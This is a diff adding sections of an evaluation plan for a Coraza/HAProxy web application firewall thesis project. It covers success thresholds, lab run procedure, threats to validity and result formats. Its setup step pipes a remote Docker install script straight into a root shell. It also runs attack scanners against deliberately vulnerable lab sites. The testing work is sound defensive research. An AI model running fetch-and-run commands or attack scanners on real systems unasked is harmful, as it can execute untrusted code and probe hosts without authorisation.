+Each scenario writes `benchmarks/results/run-<RUN_ID>/<scenario>/summary.json`. Aggregated output: `benchmarks/results/run-<RUN_ID>/results.csv` (one row per scenario).
+
+---
+
+## 7. Success Criteria
+
+> **Note:** The thresholds below are proposed defaults derived from `README.testing.md` and common WAF benchmarks. Confirm with the thesis supervisor before the final evaluation run.
+
+| Metric | Target | Source |
+|---|---|---|
+| TPR (go-ftw CRS corpus) | ≥ 95% | CRS project target; README.testing.md |
+| FPR on benign traffic (ZAP on WordPress) | < 10% | README.testing.md |
+| RPS degradation | < 20% | README.testing.md |
+| Latency overhead p95 | ≤ 50 ms | Common WAF SLA baseline |
+| Memory footprint (coraza container) | Reported (no hard cap) | Informational for thesis |
+
+A run is considered **successful** if TPR ≥ 95% and FPR < 10% and RPS degradation < 20%. Latency overhead is reported regardless. Resource usage is informational.
+
+---
+
+## 8. Run Procedure
+
+### 8.1 First-time setup
+
+On the Proxmox LXC (after provisioning per §2):
+
+```bash
+# 1. Install Docker
+curl -fsSL https://get.docker.com | sh
+usermod -aG docker root
+
+# 2. Clone repo
+git clone https://github.com/bihius/guard-proxy.git /opt/guard-proxy
+cd /opt/guard-proxy
+
+# 3. Initialise CRS submodule
+git submodule update --init --recursive
+
+# 4. Copy env files
+cp deploy/demo/.env.example deploy/demo/.env
+cp benchmarks/lab/.env.example benchmarks/lab/.env
+# Edit both .env files if needed (passwords, ports)
+
+# 5. Bring up the lab
+make eval-up
+```
+
+### 8.2 Running the evaluation
+
+```bash
+cd /opt/guard-proxy
+
+# Single pass (for smoke check):
+make eval-all
+
+# Three passes for thesis (median of three):
+for i in 1 2 3; do
+  RUN_ID=$(date +%Y%m%d-%H%M%S) make eval-all
+  sleep 60  # brief pause between runs
+done
+
+# View results summary:
+make eval-results
+```
+
+### 8.3 Changing target vhost
+
+```bash
+# Run ZAP against WordPress (best FPR target):
+make eval-zap TARGET_VHOST=wp.local
+
+# Run load test against DVWA:
+make eval-load TARGET_VHOST=dvwa.local DIRECT_HOST=dvwa DIRECT_PORT=80
+```
+
+### 8.4 Collecting results for the thesis
+
+After runs complete:
+
+```bash
+# Aggregate to CSV:
+RUN_ID=<id> make eval-metrics
+
+# Copy curated results to thesis:
+cp benchmarks/results/run-<id>/results.csv thesis/assets/figures/eval-results-<id>.csv
+```
+
+---
+
+## 9. Threats to Validity
+
+### 9.1 Noisy-neighbour CPU contention
+
+The Proxmox host runs a live homelab (media services). CPU pinning to cores 18–23 mitigates this, but memory bandwidth and I/O remain shared. **Mitigation:** run during low-traffic hours (early morning); record host load in `manifest.json`; discard outlier runs.
+
+### 9.2 Single-host load generator
+
+The wrk container and the WAF stack run on the same host. The load generator's CPU consumption competes with the WAF. **Effect:** RPS numbers may be pessimistic (load generator throttles before WAF saturates). **Mitigation:** document the single-host topology as a limitation; the relative overhead delta (WAF vs direct) is still valid because both runs share the same load-generator cost.
+
+### 9.3 WordPress false positives without CRS exclusions
+
+WordPress is tested without CRS application exclusion plugins (not yet implemented in the backend). The reported FPR against WordPress is for an **untuned** WAF+CMS combination. This is explicitly documented as a finding. The expected FPR will decrease once per-vhost Coraza configuration supports exclusion plugins.
+
+### 9.4 go-ftw TP/FP split approximation
+
+go-ftw v1.x reports aggregate pass/fail counts, not per-case attack/benign labels. The TP/FP split uses an estimated attack ratio (85%). Rerunning with go-ftw v2 `--output json-per-test` provides the exact split.
+
+---
+
+## 10. Results Format
+
+### summary.json (per scenario)
+
+```json
+{
+  "run_id": "20260602-141500",
+  "scenario": "ftw | zap-<vhost> | nuclei-<vhost> | load-<vhost>",
+  "target_vhost": "juice.local",
+  "policy": {
+    "name": "Lab Baseline",
+    "paranoia": 1,
+    "inbound_threshold": 5,
+    "mode": "block"
+  },
+  "detection": {
+    "true_positive": 312,
+    "false_negative": 18,
+    "true_negative": 140,
+    "false_positive": 4,
+    "tpr": 0.945,
+    "fpr": 0.028
+  },
+  "performance": {
+    "rps": 4120.5,
+    "baseline_rps": 5980.0,
+    "rps_degradation_pct": 31.1,
+    "latency_ms": { "p50": 2.1, "p95": 7.8, "p99": 18.4 },
+    "latency_overhead_ms": { "p50": 0.9, "p95": 3.1, "p99": 7.0 }
+  },
+  "resources": {
+    "coraza": { "mem_mb_peak": 410, "cpu_pct_avg": 62 },
+    "haproxy": { "mem_mb_peak": 95, "cpu_pct_avg": 40 }
+  }
+}
+```
+
+### results.csv
+
+Flat CSV with one row per scenario run. Consumed directly by `thesis/chapters/06-testy.md` tables.
+
+Columns: `run_id`, `scenario`, `target_vhost`, `policy`, `tpr`, `fpr`, `tp`, `fn`, `tn`, `fp`, `waf_blocks_from_log`, `rps_waf`, `rps_direct`, `rps_degradation_pct`, `lat_p50_ms`, `lat_p95_ms`, `lat_p99_ms`, `lat_oh_p50_ms`, `lat_oh_p95_ms`, `lat_oh_p99_ms`, `coraza_mem_mb_peak`, `coraza_cpu_pct_avg`, `haproxy_mem_mb_peak`, `haproxy_cpu_pct_avg`.